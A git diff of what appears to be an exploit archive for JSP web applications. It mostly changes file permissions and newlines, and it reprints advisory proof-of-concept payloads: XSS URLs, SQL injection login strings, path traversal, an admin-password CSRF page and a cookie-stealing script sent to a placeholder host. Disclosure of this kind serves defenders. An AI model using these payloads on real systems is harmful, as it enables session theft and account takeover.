attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/search.jsp?oe=english&q=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&qor= \ No newline at end of file +http://www.example.com/search.jsp?oe=english&q=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&qor= \ No newline at end of file diff --git a/platforms/jsp/webapps/26778.txt b/platforms/jsp/webapps/26778.txt old mode 100755 new mode 100644 index 9eb171db8..c57b0a90f --- a/platforms/jsp/webapps/26778.txt +++ b/platforms/jsp/webapps/26778.txt @@ -6,4 +6,4 @@ Successful exploitation may result in various attacks, such as information discl Blackboard Academic Suite version 6.0 is reportedly affected by this issue. -http://www.example.com/webapps/portal/frameset.jsp?tab_id=[tabid]&url=[url] \ No newline at end of file +http://www.example.com/webapps/portal/frameset.jsp?tab_id=[tabid]&url=[url] \ No newline at end of file diff --git a/platforms/jsp/webapps/26924.txt b/platforms/jsp/webapps/26924.txt old mode 100755 new mode 100644 index cc57225b2..a293e9ac2 --- a/platforms/jsp/webapps/26924.txt +++ b/platforms/jsp/webapps/26924.txt @@ -5,4 +5,4 @@ OpenEdit is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. /store/search/results.html?query=&department=&oe-action=[XSS] -/store/search/results.html?page=[XSS] \ No newline at end of file +/store/search/results.html?page=[XSS] \ No newline at end of file diff --git a/platforms/jsp/webapps/26972.txt b/platforms/jsp/webapps/26972.txt old mode 100755 new mode 100644 index d5c19c1b1..443250a4d --- a/platforms/jsp/webapps/26972.txt +++ b/platforms/jsp/webapps/26972.txt @@ -19,4 +19,4 @@ RowKeyValue=<script>alert(document.cookie)</script> Source code disclosure: http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL& -df_next_page=htdocs/search.jsp%00 \ No newline at end of file +df_next_page=htdocs/search.jsp%00 \ No newline at end of file diff --git a/platforms/jsp/webapps/27011.txt b/platforms/jsp/webapps/27011.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/27463.txt b/platforms/jsp/webapps/27463.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/27558.txt b/platforms/jsp/webapps/27558.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/27559.txt b/platforms/jsp/webapps/27559.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/27684.txt b/platforms/jsp/webapps/27684.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/28278.txt b/platforms/jsp/webapps/28278.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/28605.txt b/platforms/jsp/webapps/28605.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/28606.txt b/platforms/jsp/webapps/28606.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/28607.txt b/platforms/jsp/webapps/28607.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/28608.txt b/platforms/jsp/webapps/28608.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/28609.txt b/platforms/jsp/webapps/28609.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/28610.txt b/platforms/jsp/webapps/28610.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/29301.txt b/platforms/jsp/webapps/29301.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/29576.txt b/platforms/jsp/webapps/29576.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/29674.txt b/platforms/jsp/webapps/29674.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/29811.txt b/platforms/jsp/webapps/29811.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30054.txt b/platforms/jsp/webapps/30054.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30189.txt b/platforms/jsp/webapps/30189.txt old mode 100755 new mode 100644 index 27762e9fe..ddc400f3c --- a/platforms/jsp/webapps/30189.txt +++ b/platforms/jsp/webapps/30189.txt @@ -4,4 +4,4 @@ Apache Tomcat is prone to a cross-site scripting vulnerability because it fails Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http:/;www.example.com/jsp-examples/snp/snoop.jsp;[xss] \ No newline at end of file +http:/;www.example.com/jsp-examples/snp/snoop.jsp;[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/30191.txt b/platforms/jsp/webapps/30191.txt old mode 100755 new mode 100644 index 81d04999a..bcd0a33f9 --- a/platforms/jsp/webapps/30191.txt +++ b/platforms/jsp/webapps/30191.txt @@ -4,4 +4,4 @@ Apache Tomahawk MyFaces JSF Framework is prone to a cross-site scripting vulnera Exploiting this vulnerability may allow an attacker to launch cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http:/;www.example.com/some_app.jsf?autoscroll=[javascript] \ No newline at end of file +http:/;www.example.com/some_app.jsf?autoscroll=[javascript] \ No newline at end of file diff --git a/platforms/jsp/webapps/30266.txt b/platforms/jsp/webapps/30266.txt old mode 100755 new mode 100644 index af51f7229..54b2f7fff --- a/platforms/jsp/webapps/30266.txt +++ b/platforms/jsp/webapps/30266.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br This issue affects NetFlow Analyzer 5; other versions may also be affected. -http://www.example.com/netflow/jspui/applicationList.jsp?alph a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68 %72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F %6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C %2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70 %3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E %3C%2F%62%6F%64%79%3E \ No newline at end of file +http://www.example.com/netflow/jspui/applicationList.jsp?alph a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68 %72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F %6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C %2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70 %3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E %3C%2F%62%6F%64%79%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/30267.txt b/platforms/jsp/webapps/30267.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30268.txt b/platforms/jsp/webapps/30268.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30269.txt b/platforms/jsp/webapps/30269.txt old mode 100755 new mode 100644 index ef5fb39e2..4835829de --- a/platforms/jsp/webapps/30269.txt +++ b/platforms/jsp/webapps/30269.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br This issue affects NetFlow Analyzer 5; other versions may also be affected. - http://www.example.com/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E \ No newline at end of file + http://www.example.com/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/30270.txt b/platforms/jsp/webapps/30270.txt old mode 100755 new mode 100644 index b1279fb45..d4b2b4291 --- a/platforms/jsp/webapps/30270.txt +++ b/platforms/jsp/webapps/30270.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br This issue affects NetFlow Analyzer 5; other versions may also be affected. -http://www.example.com/netflow/jspui/customReport.jsp?rtype=gl obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68% 72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62 %6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2 0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62% 72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73 %63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2 E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F% 64%79%3E&period=hourly&customOption=true&firstTime=true \ No newline at end of file +http://www.example.com/netflow/jspui/customReport.jsp?rtype=gl obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68% 72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62 %6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2 0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62% 72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73 %63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2 E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F% 64%79%3E&period=hourly&customOption=true&firstTime=true \ No newline at end of file diff --git a/platforms/jsp/webapps/30563.txt b/platforms/jsp/webapps/30563.txt old mode 100755 new mode 100644 index a30842df5..07caa8367 --- a/platforms/jsp/webapps/30563.txt +++ b/platforms/jsp/webapps/30563.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Apache Tomcat 4.1.31; other versions may also be affected. -http://www.example.com/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e \ No newline at end of file +http://www.example.com/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e \ No newline at end of file diff --git a/platforms/jsp/webapps/30608.txt b/platforms/jsp/webapps/30608.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30609.txt b/platforms/jsp/webapps/30609.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30610.txt b/platforms/jsp/webapps/30610.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30611.txt b/platforms/jsp/webapps/30611.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30612.txt b/platforms/jsp/webapps/30612.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30613.txt b/platforms/jsp/webapps/30613.txt old mode 100755 new mode 100644 index ff98be8d1..c5fb044b2 --- a/platforms/jsp/webapps/30613.txt +++ b/platforms/jsp/webapps/30613.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code will run in the context of the affected s Versions prior to JSPWiki 2.5.138-beta are vulnerable. -http://www.example.com/wiki/Diff.jsp?page=Administrator&r1=[XSS]&r2=[XSS] \ No newline at end of file +http://www.example.com/wiki/Diff.jsp?page=Administrator&r1=[XSS]&r2=[XSS] \ No newline at end of file diff --git a/platforms/jsp/webapps/30675.txt b/platforms/jsp/webapps/30675.txt old mode 100755 new mode 100644 index d280431f0..447e4bf03 --- a/platforms/jsp/webapps/30675.txt +++ b/platforms/jsp/webapps/30675.txt @@ -4,4 +4,4 @@ InnovaShop is prone to multiple cross-site scripting vulnerabilities because the An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/tc/contents/home001.jsp?contentid=[XSS] \ No newline at end of file +http://www.example.com/path/tc/contents/home001.jsp?contentid=[XSS] \ No newline at end of file diff --git a/platforms/jsp/webapps/30676.txt b/platforms/jsp/webapps/30676.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30704.txt b/platforms/jsp/webapps/30704.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/30705.txt b/platforms/jsp/webapps/30705.txt old mode 100755 new mode 100644 index 122468821..60ae83e31 --- a/platforms/jsp/webapps/30705.txt +++ b/platforms/jsp/webapps/30705.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/26182/info GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. -http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx \ No newline at end of file +http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx \ No newline at end of file diff --git a/platforms/jsp/webapps/31004.txt b/platforms/jsp/webapps/31004.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/31005.txt b/platforms/jsp/webapps/31005.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/31006.txt b/platforms/jsp/webapps/31006.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/31007.txt b/platforms/jsp/webapps/31007.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/31299.txt b/platforms/jsp/webapps/31299.txt old mode 100755 new mode 100644 index 8d4780a2f..db5730c0d --- a/platforms/jsp/webapps/31299.txt +++ b/platforms/jsp/webapps/31299.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OpenCms 7.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/ \ No newline at end of file +http://www.example.com/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/ \ No newline at end of file diff --git a/platforms/jsp/webapps/31445.txt b/platforms/jsp/webapps/31445.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/31446.txt b/platforms/jsp/webapps/31446.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/31475.txt b/platforms/jsp/webapps/31475.txt old mode 100755 new mode 100644 index b120df21b..3d3e88cf4 --- a/platforms/jsp/webapps/31475.txt +++ b/platforms/jsp/webapps/31475.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br OpenCms 7.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E \ No newline at end of file +http://www.example.com/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/32046.txt b/platforms/jsp/webapps/32046.txt old mode 100755 new mode 100644 index c9197aafc..5ddbdd5cc --- a/platforms/jsp/webapps/32046.txt +++ b/platforms/jsp/webapps/32046.txt @@ -14,4 +14,4 @@ Accept-Encoding: <script>alert('XSS');</script> User-Agent: <script>alert('XSS');</script> Host: maximo Connection: Keep-Alive -Cookie: <script>alert('XSS');</script> \ No newline at end of file +Cookie: <script>alert('XSS');</script> \ No newline at end of file diff --git a/platforms/jsp/webapps/32249.txt b/platforms/jsp/webapps/32249.txt old mode 100755 new mode 100644 index afecbed1e..8e8d6c268 --- a/platforms/jsp/webapps/32249.txt +++ b/platforms/jsp/webapps/32249.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Openfire 3.5.2 is vulnerable; prior versions are also affected. -http://www.example.com/login.jsp?url=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22hi%22)%3C/script%3E \ No newline at end of file +http://www.example.com/login.jsp?url=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22hi%22)%3C/script%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/32368.txt b/platforms/jsp/webapps/32368.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/32423.txt b/platforms/jsp/webapps/32423.txt old mode 100755 new mode 100644 index 1fd21e44e..764f79474 --- a/platforms/jsp/webapps/32423.txt +++ b/platforms/jsp/webapps/32423.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to OpenNMS 1.5.94 are vulnerable. -http://www.example.com/opennms/j_acegi_security_check?j_username=test'><script>alert('hi');</script>&j_password=test \ No newline at end of file +http://www.example.com/opennms/j_acegi_security_check?j_username=test'><script>alert('hi');</script>&j_password=test \ No newline at end of file diff --git a/platforms/jsp/webapps/32424.txt b/platforms/jsp/webapps/32424.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/32425.txt b/platforms/jsp/webapps/32425.txt old mode 100755 new mode 100644 index 23dd1ec9a..b726f0cf0 --- a/platforms/jsp/webapps/32425.txt +++ b/platforms/jsp/webapps/32425.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to OpenNMS 1.5.94 are vulnerable. -http://www.example.com/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.* \ No newline at end of file +http://www.example.com/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.* \ No newline at end of file diff --git a/platforms/jsp/webapps/32579.html b/platforms/jsp/webapps/32579.html old mode 100755 new mode 100644 index 67b5af7a1..0fe962540 --- a/platforms/jsp/webapps/32579.html +++ b/platforms/jsp/webapps/32579.html @@ -15,4 +15,4 @@ Sun Java System Identity Manager 6.0 SP4 Sun Java System Identity Manager 7.0 Sun Java System Identity Manager 7.1 -<html> <h1>CSRF attack demo - changes administrative password to 'Password19'</h1> <script> var img = new Image(); img.src = 'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Passwo rd19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true'; </script> </html> \ No newline at end of file +<html> <h1>CSRF attack demo - changes administrative password to 'Password19'</h1> <script> var img = new Image(); img.src = 'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Passwo rd19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true'; </script> </html> \ No newline at end of file diff --git a/platforms/jsp/webapps/32655.txt b/platforms/jsp/webapps/32655.txt old mode 100755 new mode 100644 index 9deac2163..196541c5e --- a/platforms/jsp/webapps/32655.txt +++ b/platforms/jsp/webapps/32655.txt @@ -12,4 +12,4 @@ Affiliate Software The following example data is available: username: r0' or ' 1=1-- -password: r0' or ' 1=1-- \ No newline at end of file +password: r0' or ' 1=1-- \ No newline at end of file diff --git a/platforms/jsp/webapps/32677.txt b/platforms/jsp/webapps/32677.txt old mode 100755 new mode 100644 index ff38057a7..dbeb5237a --- a/platforms/jsp/webapps/32677.txt +++ b/platforms/jsp/webapps/32677.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Openfire 3.6.2 is vulnerable; prior versions may also be affected. -http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss] \ No newline at end of file +http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32678.txt b/platforms/jsp/webapps/32678.txt old mode 100755 new mode 100644 index c99c4f345..784c57611 --- a/platforms/jsp/webapps/32678.txt +++ b/platforms/jsp/webapps/32678.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Openfire 3.6.2 is vulnerable; prior versions may also be affected. -http://www.example.com/user-properties.jsp?username=%3C[xss] \ No newline at end of file +http://www.example.com/user-properties.jsp?username=%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32679.txt b/platforms/jsp/webapps/32679.txt old mode 100755 new mode 100644 index b44e43a6d..0e2bd8392 --- a/platforms/jsp/webapps/32679.txt +++ b/platforms/jsp/webapps/32679.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Openfire 3.6.2 is vulnerable; prior versions may also be affected. -http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss] \ No newline at end of file +http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32680.txt b/platforms/jsp/webapps/32680.txt old mode 100755 new mode 100644 index c01219c1e..19a474f29 --- a/platforms/jsp/webapps/32680.txt +++ b/platforms/jsp/webapps/32680.txt @@ -6,4 +6,4 @@ Exploiting the issue may allow an attacker to obtain sensitive information that Openfire 3.6.2 is vulnerable; prior versions may also be affected. -http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup \ No newline at end of file +http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup \ No newline at end of file diff --git a/platforms/jsp/webapps/32708.txt b/platforms/jsp/webapps/32708.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/32709.txt b/platforms/jsp/webapps/32709.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/32710.txt b/platforms/jsp/webapps/32710.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/32741.txt b/platforms/jsp/webapps/32741.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/32742.txt b/platforms/jsp/webapps/32742.txt old mode 100755 new mode 100644 index ecc3d3911..9f71f65bd --- a/platforms/jsp/webapps/32742.txt +++ b/platforms/jsp/webapps/32742.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to Apache Jackrabbit 1.5.2 are vulnerable. -http://www.example.com/swr.jsp?q=%25"<script>alert(1)</script>&swrnum=1 \ No newline at end of file +http://www.example.com/swr.jsp?q=%25"<script>alert(1)</script>&swrnum=1 \ No newline at end of file diff --git a/platforms/jsp/webapps/33209.txt b/platforms/jsp/webapps/33209.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33292.txt b/platforms/jsp/webapps/33292.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33293.txt b/platforms/jsp/webapps/33293.txt old mode 100755 new mode 100644 index e716a8d10..515671d98 --- a/platforms/jsp/webapps/33293.txt +++ b/platforms/jsp/webapps/33293.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect IBM Rational RequisitePro 7.10; other versions may also be affected. -http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script> \ No newline at end of file +http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script> \ No newline at end of file diff --git a/platforms/jsp/webapps/33346.txt b/platforms/jsp/webapps/33346.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33347.txt b/platforms/jsp/webapps/33347.txt old mode 100755 new mode 100644 index de4964d26..091fa3c53 --- a/platforms/jsp/webapps/33347.txt +++ b/platforms/jsp/webapps/33347.txt @@ -8,4 +8,4 @@ This issue affects McAfee Network Security Manager 5.1.7.7; other versions may a https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1 -4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57 \ No newline at end of file +4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57 \ No newline at end of file diff --git a/platforms/jsp/webapps/33564.txt b/platforms/jsp/webapps/33564.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33596.txt b/platforms/jsp/webapps/33596.txt old mode 100755 new mode 100644 index 0d32efcd5..e5385955a --- a/platforms/jsp/webapps/33596.txt +++ b/platforms/jsp/webapps/33596.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br KnowGate hipergate 4.0.12 is vulnerable; other versions may also be affected. http://www.example.com:8080/hipergate/common/errmsg.jsp?title=%3Cscript%3Ealert%28%22titleXSS%22%29; -%3C/script%3E&desc=%3Cscript%3Ealert%28%22descXSS%22%29;%3C/script%3E&resume=_back \ No newline at end of file +%3C/script%3E&desc=%3Cscript%3Ealert%28%22descXSS%22%29;%3C/script%3E&resume=_back \ No newline at end of file diff --git a/platforms/jsp/webapps/33675.txt b/platforms/jsp/webapps/33675.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33678.txt b/platforms/jsp/webapps/33678.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33691.txt b/platforms/jsp/webapps/33691.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33779.txt b/platforms/jsp/webapps/33779.txt old mode 100755 new mode 100644 index b2925ba10..301f58208 --- a/platforms/jsp/webapps/33779.txt +++ b/platforms/jsp/webapps/33779.txt @@ -4,4 +4,4 @@ agXchange ESM is prone to an open-redirection vulnerability because the applicat A successful exploit may aid in phishing attacks; other attacks are possible. -http://www.example.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com \ No newline at end of file +http://www.example.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com \ No newline at end of file diff --git a/platforms/jsp/webapps/33785.txt b/platforms/jsp/webapps/33785.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/33942.txt b/platforms/jsp/webapps/33942.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/34092.txt b/platforms/jsp/webapps/34092.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/34179.txt b/platforms/jsp/webapps/34179.txt old mode 100755 new mode 100644 index 5b29d165c..2e7b845b4 --- a/platforms/jsp/webapps/34179.txt +++ b/platforms/jsp/webapps/34179.txt @@ -8,4 +8,4 @@ The issue affects version 6.7. The following example input to the URI is available: -?<script>alert(31521);</script>? \ No newline at end of file +?<script>alert(31521);</script>? \ No newline at end of file diff --git a/platforms/jsp/webapps/34370.txt b/platforms/jsp/webapps/34370.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/34384.txt b/platforms/jsp/webapps/34384.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/34440.txt b/platforms/jsp/webapps/34440.txt old mode 100755 new mode 100644 index 